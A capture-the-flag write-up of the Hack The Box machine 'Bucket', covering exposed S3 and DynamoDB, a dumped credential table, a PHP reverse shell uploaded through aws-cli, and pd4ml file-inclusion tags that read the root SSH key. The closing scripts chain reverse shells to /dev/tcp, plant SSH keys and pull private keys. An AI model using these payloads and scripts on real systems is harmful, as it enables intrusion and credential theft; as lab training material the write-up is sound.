Hack The Box - Bucket Writeup
Bucket is a Medium-tier vulnerable Linux virtual machine, created by MrR3boot.
The goal of my participation in Hack The Box is to learn which tools are used for analysis and exploitation of a variety of protocols, and how to use them efficiently. A side goal is to be exposed to unfamiliar software.
Summary
| Name | Bucket |
| --- | --- |
| Creator | MrR3boot |
| IP Address | 10.10.10.212 |
| OS | Linux |
| Release Date | 2020-10-17 |
| Retirement Date | 2021-04-24 |
| Difficulty | Medium (30 points) |
To begin the process, we notice that an advertising executive has decided to store images in The Cloud™. Notably, The Cloud™ has been left wide open; we are able to read private credentials from a DynamoDB instance, and upload files to the public website, by interacting with The Cloud™.
Once we upload a malicious file and synchronise, we discover a web application in development. The application accepts input from The Cloud™, and hands this input to a buggy PDF creation library. We send in a string, and download a PDF containing goodies, including the key to root access.
Comfortably Numb
Running nmap
Firstly, we add the machine to `/etc/hosts`, and run `nmap`. The output from the detailed portscan reveals two services of interest.
Nmap scan report for bucket.htb (10.10.10.212)
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upon visiting the homepage, nothing stands out visibly. We take a quick look at the source code, and notice that some images are sourced from a subdomain.
<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
So, we are dealing with one of Amazon's `s3` buckets.
Adding this subdomain to `/etc/hosts` is necessary here. Visiting the page, we are greeted by an insightful message:
{"status": "running"}
How exciting.
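For reference, both hostnames resolve to the same address, so a single `/etc/hosts` line covers them (IP from the machine info page):

```
10.10.10.212    bucket.htb s3.bucket.htb
```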
Trying to list the subdirectory leads to pain and suffering.
<Error>
<Code>NoSuchKey</Code>
<Message>The specified key does not exist.</Message>
<RequestID>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</RequestID>
</Error>
We'll need to learn how to use S3, but firstly, it might be worth scanning this subdomain.
Digging Around
Two interesting endpoints show up immediately upon scanning: `health` and `shell`.
> ffuf -u http://s3.bucket.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.0.2
________________________________________________
:: Method : GET
:: URL : http://s3.bucket.htb/FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
health [Status: 200, Size: 54, Words: 5, Lines: 1]
shell [Status: 200, Size: 0, Words: 1, Lines: 1]
--[[snip]]--
Incidentally, the response headers reveal that the server self-identifies as `hypercorn-h11`.
The `/health` endpoint reveals a `dynamodb` service is lurking around somewhere... We'll have to keep an eye out.
{"services": {"s3": "running", "dynamodb": "running"}}
The `/shell` endpoint attempts to redirect us to `http://444af250749d:4566/shell/`. That looks like something worth overcoming.
Adding a `/` to the end of the URL returns a `DynamoDB JavaScript Shell`.
DynamoDB Reading
Learning The Shell
A range of code templates is offered to run in this GUI console. The list is as follows:
- PutItem
- UpdateItem
- DeleteItem
- BatchWriteItem
- GetItem
- BatchGetItem
- Query
- Scan
- CreateTable
- UpdateTable
- DeleteTable
- DescribeTable
- ListTables
- WaitFor
Firstly, we use `ListTables`, and discover that the only table accessible is the `users` table.
We ask for a description with `DescribeTable`, which returns the following result:
{
    "Table": {
        "AttributeDefinitions": [
            {
                "AttributeName": "username",
                "AttributeType": "S"
            },
            {
                "AttributeName": "password",
                "AttributeType": "S"
            }
        ],
        "TableName": "users",
        "KeySchema": [
            {
                "AttributeName": "username",
                "KeyType": "HASH"
            },
            {
                "AttributeName": "password",
                "KeyType": "RANGE"
            }
        ],
        "TableStatus": "ACTIVE",
        "CreationDateTime": "2020-10-xxTxx:30:05.055Z",
        "ProvisionedThroughput": {
            "LastIncreaseDateTime": "1970-01-01T00:00:00.000Z",
            "LastDecreaseDateTime": "1970-01-01T00:00:00.000Z",
            "NumberOfDecreasesToday": 0,
            "ReadCapacityUnits": 5,
            "WriteCapacityUnits": 5
        },
        "TableSizeBytes": 107,
        "ItemCount": 3,
        "TableArn": "arn:aws:dynamodb:us-east-1:000000000000:table/users"
    }
}
This should contain some juicy credentials...
The default examples did not contain any simple script to dump the contents of a table, so I wrote the following, based on a StackOverflow post.
var params = {
    TableName: "users",
    Select: "ALL_ATTRIBUTES"
};

function doScan(response) {
    if (response.error) ppJson(response.error);
    else {
        ppJson(response.data);
        // Continue scanning if more data is possible
        if ('LastEvaluatedKey' in response.data) {
            response.request.params.ExclusiveStartKey = response.data.LastEvaluatedKey;
            dynamodb.scan(response.request.params)
                .on('complete', doScan)
                .send();
        }
    }
}

console.log("Initiating Table Dump");
dynamodb.scan(params)
    .on('complete', doScan)
    .send();
Running this provided a response...
Juicy Creds
And the response contained user credentials!
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}
In summary, we are continuing with the following:
Cloudadm:Welcome123!
Sysadm:n2vM-<_K_Q:.Aa2
Mgmt:Management@#1@#
None of these credentials work for `ssh` access. We will likely need to use the `aws s3` API to gain a foothold.
Editor's Note: If we had met our user at this stage, or perhaps found their name on a theoretical expansive corporate website, we could have used a credential here for ssh without any further hassle.
The API appears to support three separate methods of access to `s3` buckets:
- `s3`
- `s3api`
- `s3control`
None of these function correctly when pointed at either `s3://s3.bucket.htb` or `http://s3.bucket.htb`. They all return strange errors.
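A likely contributor to these errors, in my experience, is local configuration: `aws-cli` refuses to send requests until a region and credentials exist, even when targeting a non-AWS endpoint. Dummy values are enough for a LocalStack-style backend; a minimal sketch of the two config files (all values are placeholders):

```ini
# ~/.aws/credentials -- any non-empty dummy values satisfy the CLI locally
[default]
aws_access_key_id = test
aws_secret_access_key = test

# ~/.aws/config -- the region must simply be present
[default]
region = us-east-1
```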
Detached Buckets
I looked around for methods to run an `s3` bucket instance without connection to the AWS cloud. There was an article on running Serverless S3, which contains usage examples for `aws-cli`. The `--endpoint` argument is the crucial element, and allows us to list the bucket contents!
> aws --endpoint http://s3.bucket.htb:80/ s3 ls
2020-10-28 xx:53:35 nikto-test-zpldnail.html
2020-10-28 xx:57:43 file.txt
2020-10-28 xx:49:04 adserver
A reverse shell as `www-data` can be grabbed by uploading a PHP payload to the open `adserver` bucket, and synchronising to the main website!
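The `s.php` payload itself is not shown below, so here is a minimal sketch of the kind of one-line PHP reverse shell used; the IP and port are placeholders for the attacker's tun0 address and a waiting `nc` listener.

```shell
# Build a minimal PHP reverse-shell payload (placeholder attacker IP/port).
LHOST=10.10.14.38
LPORT=4444
cat > s.php <<EOF
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"); ?>
EOF
cat s.php
```

When the synchronised copy under the webroot is requested with `curl`, the PHP executes server-side and dials back to the listener.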
> aws --endpoint http://s3.bucket.htb:80/ s3 ls s3://adserver
PRE images/
2020-10-xx xx:03:05 5344 index.html
> aws --endpoint http://s3.bucket.htb:80/ s3 cp s.php s3://adserver/s.php
upload: ./s.php to s3://adserver/s.php
> aws --endpoint http://s3.bucket.htb:80/ s3 ls s3://adserver
PRE images/
2020-10-xx xx:03:05 5344 index.html
2020-10-xx xx:03:57 5493 s.php
> aws --endpoint http://s3.bucket.htb:80/ s3 website s3://adserver
> curl -v http://bucket.htb/s.php
These steps needed to be taken in quick succession. No AWS credentials were required.
We receive a shell as `www-data`!
> nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.38] from bucket.htb [10.10.10.212] 52634
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
10:04:28 up 4:36, 0 users, load average: 0.28, 0.21, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami && id && hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket
Hello, IT!
Have You Tried Turning
From here, there is a good chance that one of our credentials is valid for a user on the box. I'll hedge my bets on the `Sysadm` credential.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@bucket:/$ ls /home
roy
www-data@bucket:/$ su roy
Password: n2vM-<_K_Q:.Aa2
roy@bucket:/$ cat /home/roy/user.txt
0775bff...
roy@bucket:/$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)
We have `user.txt`! Note that we can log in as `roy` with this credential over `ssh` directly.
It Off and On Again?
We run a quick recon, including a process monitor, and notice two facts:
- port `4566` is locally accessible, and
- there is a cronjob running `aws-cli` commands against that port!
xx:28 96507 root /usr/bin/python3 /usr/bin/aws --endpoint-url=http://localhost:4566 s3 sync /root/backups/ s3://adserver
Notably, the following command (whether run on the attacking host or the remote host) grants the same username/password information as was accessible through the `/shell/` page earlier. My code was, sadly, unnecessary.
$ aws --endpoint-url=http://localhost:4566 dynamodb scan --table-name users
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
--[[snip]]--
What other aws services could be accessible?
Plenty of them, but as it turns out, there are some more interesting fish in the sea.
Bucket Application
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>
--[[snip]]--
I initially checked whether `mpm_itk_module` was vulnerable, but it's just a required module for reassigning the user under which the VHost is running...
This vhost (running as `root`!) turns out to be an application that connects to DynamoDB, with an interesting piece of functionality at the top of the `index.php` file.
$ ls -al /var/www/bucket-app
total 856
drwxr-x---+ 4 root root 4096 Sep 23 10:56 .
drwxr-xr-x 4 root root 4096 Sep 21 12:28 ..
-rw-r-x---+ 1 root root 63 Sep 23 02:23 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 02:23 composer.lock
drwxr-x---+ 2 root root 4096 Oct xx 08:44 files
-rwxr-x---+ 1 root root 17222 Sep 23 03:32 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 11:50 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Sep 23 02:23 vendor
$ cat /var/www/bucket-app/index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;

if ($_SERVER["REQUEST_METHOD"] === "POST") {
    if ($_POST["action"] === "get_alerts") {
        date_default_timezone_set('America/New_York');
        $client = new DynamoDbClient([
            'profile' => 'default',
            'region' => 'us-east-1',
            'version' => 'latest',
            'endpoint' => 'http://localhost:4566'
        ]);
        $iterator = $client->getIterator('Scan', array(
            'TableName' => 'alerts',
            'FilterExpression' => "title = :title",
            'ExpressionAttributeValues' => array(":title" => array("S" => "Ransomware")),
        ));
        foreach ($iterator as $item) {
            $name = rand(1, 10000) . '.html';
            file_put_contents('files/' . $name, $item["data"]);
        }
        passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    }
}
--[[snip]]--
The rest of the file is an "Under Construction" page for a `<Bucket Application/>`. No other interesting code execution occurs.
A quick search on the `pd4ml` library they are using in this snippet brings up a recent bug bounty writeup, demonstrating an easily usable tag for arbitrary file reading: `<pd4ml:attachment src="file:///etc/passwd"><pd4ml:attachment>`.
Editor's Note - this must have been intentionally obfuscated...
Local File Inclusion
Exploiting pd4ml
I believe that creating and populating a `DynamoDB` table called `alerts` will allow us to read some critical files, and gain full root access.
After reading a lot of documentation, I ended up with an understanding of the arguments required to create a table.
> aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb create-table --table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
{
    "TableDescription": {
        "AttributeDefinitions": [
            {
                "AttributeName": "title",
                "AttributeType": "S"
            },
            {
                "AttributeName": "data",
                "AttributeType": "S"
            }
        ],
        "TableName": "alerts",
        "KeySchema": [
            {
                "AttributeName": "title",
                "KeyType": "HASH"
            },
            {
                "AttributeName": "data",
                "KeyType": "RANGE"
            }
        ],
        "TableStatus": "ACTIVE",
        "CreationDateTime": 160xxxxxxx.237,
        "ProvisionedThroughput": {
            "LastIncreaseDateTime": 0.0,
            "LastDecreaseDateTime": 0.0,
            "NumberOfDecreasesToday": 0,
            "ReadCapacityUnits": 5,
            "WriteCapacityUnits": 5
        },
        "TableSizeBytes": 0,
        "ItemCount": 0,
        "TableArn": "arn:aws:dynamodb:us-east-1:000000000000:table/alerts"
    }
}
> aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb put-item --table-name alerts \
--item '{
"title":{"S":"Ransomware"},
"data":{"S":"<pd4ml:attachment src=\"file:///etc/passwd\"><pd4ml:attachment>"}
}'
{
    "ConsumedCapacity": {
        "TableName": "alerts",
        "CapacityUnits": 1.0
    }
}
We quickly attempt to trigger the behaviour in the `index.php` file.
$ curl -X POST localhost:8000 --data "action=get_alerts"
$ ls /var/www/bucket-app/files
2925.html result.pdf
$ cat /var/www/bucket-app/files/*
<pd4ml:attachment src="file:///etc/passwd"><pd4ml:attachment>%PDF-1.4
%
The file inclusion didn't trigger... How sad.
A real PDF is created when we use a simple string without this supposed LFI tag.
Testing the LFI
I added my `ssh` key to `/home/roy/.ssh/authorized_keys`, and automated the testing process in order to debug faster, using this script:
#!/usr/bin/env bash
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb create-table --table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 > /dev/null
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb put-item --table-name alerts \
--item '{
"title":{"S":"Ransomware"},
"data":{"S":"'"$*"'"}
}' > /dev/null
ssh roy@bucket.htb 'curl -s -X POST localhost:8000 --data "action=get_alerts"'
scp -r roy@bucket.htb:/var/www/bucket-app/files .
ssh roy@bucket.htb 'cat /var/www/bucket-app/files/*'
Eventually, I hit upon the other documented file-related tag in `pd4ml`: `<pd4ml:include>`!
> ./aws.sh '<pd4ml:include src=\"file:///root/root.txt\" />'
5852.html 100% 45 2.4KB/s 00:00
result.pdf 100% 1502 80.4KB/s 00:00
<pd4ml:include src="file:///root/root.txt" />%PDF-1.4
%
1 0 obj
% [24]
<<
/Filter /FlateDecode
--[[snip]]--
Opening the PDF file revealed the flag in plaintext! We have the flag, but not a shell. Let's continue...
Grabbing the SSH Key
Another fun feature of this particular LFI is directory listings. Included below are the textual contents of some PDF files.
.aws
.bash_history
.bashrc
.cache
.config
.java
.local
.profile
.ssh
backups
docker-compose.yml
files
restore.php
restore.sh
root.txt
snap
start.sh
sync.sh
authorized_keys
id_rsa
id_rsa.pub
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC--[[snip]]--
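The listings above come from pointing the same `<pd4ml:include>` tag at directories instead of files. A sketch of the three `data` payload strings fed to `put-item` for these results (paths as used above):

```shell
# Payload strings for the "data" attribute: pointing pd4ml:include at a
# directory yields a listing; at a file, its contents.
for target in 'file:///root/' 'file:///root/.ssh/' 'file:///root/.ssh/id_rsa'; do
  printf '{"title":{"S":"Ransomware"},"data":{"S":"<pd4ml:include src=\\"%s\\" />"}}\n' "$target"
done > payloads.txt
cat payloads.txt
```

Each line is a complete `--item` argument for the test script shown earlier.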
We copy this key out to a plaintext file and delete the following notice from the bottom of the file:
pd4ml evaluation copy. visit http://pd4ml.com
And we can connect as root!
> pdftotext files/result.pdf id_rsa
> vim id_rsa # manual cleanup of line breaks
> chmod 600 id_rsa
> ssh -i id_rsa root@bucket.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)
--[[snip]]--
Last login: xxx Oct xx xx:06:55 2020 from 10.10.14.38
root@bucket:~# whoami && id && hostname && wc -c root.txt
root
uid=0(root) gid=0(root) groups=0(root)
bucket
33 root.txt
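Incidentally, the manual `vim` cleanup of the extracted key is mechanical enough to script. A sketch with GNU `sed` on a synthetic stand-in for the mangled `pdftotext` output (the real output differed in its base64 body):

```shell
# Synthetic mangled key: pdftotext ran the header into the body, and
# pd4ml appended its evaluation notice.
cat > key.txt <<'EOF'
-----BEGIN OPENSSH PRIVATE KEY----b3BlbnNzaC1rZXk=
-----END OPENSSH PRIVATE KEY-----
pd4ml evaluation copy. visit http://pd4ml.com
EOF
# Restore the newline after the header and drop the pd4ml notice.
sed -i -e 's/BEGIN OPENSSH PRIVATE KEY----/BEGIN OPENSSH PRIVATE KEY-----\n/' \
       -e '/pd4ml/d' key.txt
cat key.txt
```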
After Root
Auto-root Script
We can start by automating the user shell, in order to plant our SSH key. This is intentionally done through `s3`; we could have a shell using `ssh` just as easily, with our knowledge of `roy`'s password.
Note that this script takes a few tries to synchronise the reverse shell file.
#!/usr/bin/env bash
# Fixed credential for Roy
roypw='n2vM-<_K_Q:.Aa2'
# Get tunnel IP address
ipadd=$(ip addr | grep -o "10.10.14.[^/]*")
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/${ipadd}/2222 0>&1'\"); ?>" > s.php
function listener {
sleep 0.05
echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'
su roy
${roypw}
cd ~ && mkdir -p ~/.ssh && echo '$(cat ~/.ssh/id_rsa.pub)' > ~/.ssh/authorized_keys
/bin/bash -i >& /dev/tcp/${ipadd}/3333 0>&1
" | nc -lv -q 1 -i 1 -p 2222 && touch .done > /dev/null
if [ "$?" -eq 0 ]; then echo "[+] Shell as Roy active, press return!"; fi
}
function revsh {
echo "[-] Uploading reverse shell..."
while ! [ -f ./.done ]; do
aws --endpoint http://s3.bucket.htb:80/ s3 cp s.php s3://adserver/s.php
aws --endpoint http://s3.bucket.htb:80/ s3 website s3://adserver
sleep 1 && curl -s http://bucket.htb/s.php | grep -q 404
done
rm .done
}
listener &
revsh &
# grab shell as roy
sleep 0.02
nc -lvp 3333
This returns a reverse shell as Roy, while also helpfully adding our SSH key to his `authorized_keys` file.
We can now automate downloading the flag as a PDF, converting it to (mangled) text with the `pdftotext` utility, correcting the text, and using SSH to connect as root!
#!/usr/bin/env bash
# Fixed credential for Roy
roypw='n2vM-<_K_Q:.Aa2'
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb create-table --table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 > /dev/null
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb put-item --table-name alerts \
--item '{
"title":{"S":"Ransomware"},
"data":{"S":"<pd4ml:include src=\"file:///root/.ssh/id_rsa\" />"}
}' > /dev/null
sshpass -p "${roypw}" ssh roy@bucket.htb 'curl -s -X POST localhost:8000 --data "action=get_alerts"'
sshpass -p "${roypw}" scp roy@bucket.htb:/var/www/bucket-app/files/result.pdf id_rsa.pdf
pdftotext id_rsa.pdf id_rsa
sed -i -e $'s/BEGIN OPENSSH PRIVATE KEY----/BEGIN OPENSSH PRIVATE KEY-----\\\n/' \
-e '/pd4ml/d' id_rsa
head -n2 id_rsa
echo ...
echo
echo "[+] SSH shell coming right up."
echo
chmod 600 id_rsa
ssh -i id_rsa root@bucket.htb
These scripts could easily be joined together if desired; however, this is left as an exercise for the reader!
Thanks to the box author. This was a great excuse to learn about the surface level of S3 bucket interaction. I'll likely have a reason to look more closely at this technology in the future...